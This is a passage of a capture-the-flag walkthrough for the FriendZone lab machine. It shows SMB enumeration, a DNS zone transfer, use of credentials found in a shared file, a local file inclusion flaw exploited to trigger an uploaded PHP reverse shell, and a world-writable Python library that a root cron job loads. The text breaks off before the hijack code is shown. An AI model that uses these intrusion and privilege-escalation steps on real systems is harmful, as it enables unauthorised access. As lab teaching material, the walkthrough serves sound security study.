0010 - af 26 a8 b1 cb 64 34 62-ed 0d cc 2f 46 b8 75 45 .&...d4b.../F.uE
0020 - 22 30 8b b4 08 24 99 33-d0 e4 b2 56 95 1c b3 63 "0...$.3...V...c
0030 - de 0c 5e ef d8 15 d3 0b-45 ee 8c 2d e1 93 8d 2a ..^.....E..-...*
0040 - f9 9a f5 5b f0 e0 37 33-73 a7 9b eb 0a 77 32 eb ...[..73s....w2.
0050 - 2e d8 9c 47 6b d2 ff d3-c8 9b e4 eb ff 23 86 99 ...Gk........#..
0060 - 27 67 48 c2 7e 4e 39 79-71 b3 27 98 ef 53 80 e8 'gH.~N9yq.'..S..
0070 - 2f 4f a8 d5 4e 55 72 31-aa f8 29 de 6c 7e 67 97 /O..NUr1..).l~g.
0080 - b6 6c 20 51 53 3c 69 1c-a0 4f 2e 23 7e 4c 79 6d .l QS<i..O.#~Lym
0090 - e3 e3 3b aa 4d b6 0a 4d-d6 77 f5 04 75 b8 3d f0 ..;.M..M.w..u.=.
00a0 - f7 15 39 4a 6d f7 2a 60-06 f3 f7 94 02 8f 8d d5 ..9Jm.*`........
00b0 - f2 1b ac b2 39 33 96 02-70 24 db 06 bc e1 d8 55 ....93..p$.....U
Start Time: 1563295875
Timeout : 7200 (sec)
Verify return code: 10 (certificate has expired)
Extended master secret: yes
---
closed
SMB enumeration:
root@kali:~# smbclient -L 10.10.10.123
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP FRIENDZONE
2. Getting User
At first, try to enumerate SMB because generally it does not take long.
We can find a credential.
root@kali:~# smbclient //10.10.10.123/general
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 22:10:51 2019
.. D 0 Wed Jan 23 23:51:02 2019
creds.txt N 57 Wed Oct 10 02:52:42 2018
9221460 blocks of size 1024. 6380880 blocks available
root@kali:~# cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
Then, try to look for the place which we can use this credential.
By executing SSL Certification check, we found a domain name “friendzone.red”
So try to access after adding following line in /etc/hosts.
Still same result.
Since generally DNS on TCP port 53 is for zone transfer, check what domain Friendzone has.
Subdomain list of “friendzone.red”:
root@kali:~# host -l friendzone.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzone.red has IPv6 address ::1
friendzone.red name server localhost.
friendzone.red has address 127.0.0.1
administrator1.friendzone.red has address 127.0.0.1
hr.friendzone.red has address 127.0.0.1
uploads.friendzone.red has address 127.0.0.1
Subdomain list of “friendzoneportal.red”:
root@kali:~# host -l friendzoneportal.red 10.10.10.123
Using domain server:
Name: 10.10.10.123
Address: 10.10.10.123#53
Aliases:
friendzoneportal.red has IPv6 address ::1
friendzoneportal.red name server localhost.
friendzoneportal.red has address 127.0.0.1
admin.friendzoneportal.red has address 127.0.0.1
files.friendzoneportal.red has address 127.0.0.1
imports.friendzoneportal.red has address 127.0.0.1
vpn.friendzoneportal.red has address 127.0.0.1
Then, try to look around each domains after adding following line in “/etc/hosts” with both http and https.
we can find a login form on “https://administrator1.friendzone.red/login.php”.
we can also find an interesting php script “timestamp.php”.
Next, try to access with the previous credential from SMB.
It says go to “dashboard.php”.
We found a shaddy website with php.
Then, go to “https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp” as he says.
We can see a paramter “timestamp”.
Try to replace the parameter with “login”.
The webapp showed the output of “login.php” (If we put wrong password it says “Wrong!”).
This means, we found possible LFI.
Since we already know that the path for the “File” share is “/etc/Files”.
At this time, we need some assuming the path for “Development” share to be “/etc/Development”.
Then, try to upload the reverse shell script and access with the LFI vulnerability.
Upload reverse shell:
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (50.1 kb/s)(average 50.1 kb/s)
smb: \>dir. D 0 Wed Sep 4 22:08:54 2019
.. D 0 Wed Jan 23 23:51:02 2019
php-reverse-shell.php A 5492 Wed Sep 4 22:08:54 2019
9221460 blocks of size 1024. 6369608 blocks available
Access to the reverse shell with browser after launching netcat listener:
In the directory “/var/www”, we can find a password for user “friend”.
www-data@FriendZone:/var/www$ cat mysql_data.conf
cat mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$db_name=FZ
Now we can ssh to the box with the credential
root@kali:~# ssh friend@10.10.10.123
The authenticity of host '10.10.10.123 (10.10.10.123)' can't be established.
ECDSA key fingerprint is SHA256:/CZVUU5zAwPEcbKUWZ5tCtCrEemowPRMQo5yRXTWxgw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.123' (ECDSA) to the list of known hosts.
friend@10.10.10.123's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-36-generic x86_64)* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
You have mail.
Last login: Thu Jan 24 01:20:15 2019 from 10.10.14.3
friend@FriendZone:~$
To enumerate Linux box, we can use a published script pspy.
By running this script, we can find a cron job which runs “/opt/server-admin/reporter.py”.
friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python
import os
to_address ="admin1@friendzone.com"
from_address ="admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''#os.system(command)# I need to edit the script later# Sam ~ python developer
Also, By running LinEnum, we can find a world writable script.
[-] Files not owned by user but writable by group:
-rwxrw-rw- 1 nobody nogroup 5492 Sep 4 22:08 /etc/Development/php-reverse-shell.php
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
Meaning we have following information.
“/usr/bin/python2.7/os.py” is writable worldwide
cron is executing “/opt/server-admin/reporter.py” in a couple of minute as root.
“/opt/server-admin/reporter.py” is loading “/usr/bin/python2.7/os.py”.
This indicates that we can hijack the python library.
Then, run following command to add some new lines in os.py
